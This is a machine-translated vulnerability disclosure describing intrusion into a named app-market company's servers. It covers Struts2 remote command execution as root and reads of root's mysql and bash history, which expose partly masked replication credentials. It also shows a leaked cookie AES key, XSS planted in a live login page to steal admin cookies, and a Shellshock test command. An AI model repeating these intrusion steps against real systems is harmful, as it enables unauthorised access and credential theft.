Let's say that the machine frontend getshell is coming (it affects the main business of the machine frontend network again)

Let's say that the machine frontend getshell is coming (it affects the main business of the machine frontend network again)

 

#1 cause of the Vulnerability



The struts2 command execution vulnerability is found at the following URL and can be exploited successfully.

Http://v5op.apk.gfan.com/index.action



WEB directory

/Home/tomcat8088/webapps/ROOT/



Direct GETSHELL, ROOT permission
 

 

Website physical path:/home/tomcat8088/webapps/ROOT/java. home:/usr/lib/jvm/java-6-sun-1.6.0.26/jrejava. version: 1.6.0 _ 26os. name: Linuxos. arch: amd64os. version: 2.6.35-22-serveruser.name: rootuser. home:/rootuser. dir:/home/tomcat8088java. class. version: 50w.java.class.path:/home/tomcat8088/bin/bootstrap. jarjava. library. path:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/amd64/server: /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/amd64:/usr/lib/jvm/java-6-sun-1.6.0.26/jre /.. /lib/amd64:/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/libfile. separator:/path. separator: java. vendor: Sun Microsystems Inc. java. vendor. url: http://java.sun.com/java.vm.specification.version: 1.0java.vm.specification.vendor: Sun Microsystems Inc. java. vm. specification. name: Java Virtual Machine Specificationjava. vm. version: 20.1-b02java. vm. name: Java HotSpot (TM) 64-Bit Server VMjava. specification. version: 1.6java.specification.name: Java Platform API Specificationjava. io. tmpdir:/home/tomcat8088/temp

Read mysql_history under/root/
 

CHANGE MASTER TO MASTER_HOST='10.*.*.163', MASTER_USER='r**l', MASTER_PASSWORD='A*****h', MASTER_LOG_FILE='mysql-bin.000672', MASTER_LOG_POS=536449400;start slave;

Read. bash_history
 

scp w*****g@10.*.*.169:/home/weitong/software/replace.jar .

/Backup/directory contains source code backup for the entire operation background
 

Find the cookie encryption method and key in the configuration file.
 

// Referenced classes of package com.gfan.appmarket.util://AESpublic class CookieUtil{public static final String COOKIE_NAME = "admin_passport";public static final String COOKIE_AES_KEY = "L9FMH******1jQv";public CookieUtil(){}

The previous database leakage vulnerability roughly showed some admin_user tables. The background password should be encrypted and stored in the database. How to enter the background?



In the background test, I found a user with a password of 123456. However, you can only log on without any permissions.

Check the history provided by the tool. One of the jumps is from index. jsp to index. action.

Start with index. jsp and insert XSS code. (All logged-on users must go to the background through this page after passing the login verification)

Cookies are available soon
 

Enter the background
 

Server Information:
 

Linux ubuntu181 2.6.35-22-server #33-Ubuntu SMP Sun Sep 19 20:48:58 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux

 

Distributor ID:UbuntuDescription:Ubuntu 12.04.4 LTSRelease:12.04Codename:precise

This server also has the bash vulnerability.
 

[/home/tomcat8088/webapps/ROOT/]$ env x='() { :;}; echo vulnerable'  bash -c "echo this is a test"vulnerablethis is a test

For root permission, privilege escalation-Intranet penetration-more machines fall. I am not so familiar with Linux privilege escalation, so far I have tested it.

 

Solution:

Enhanced Filtering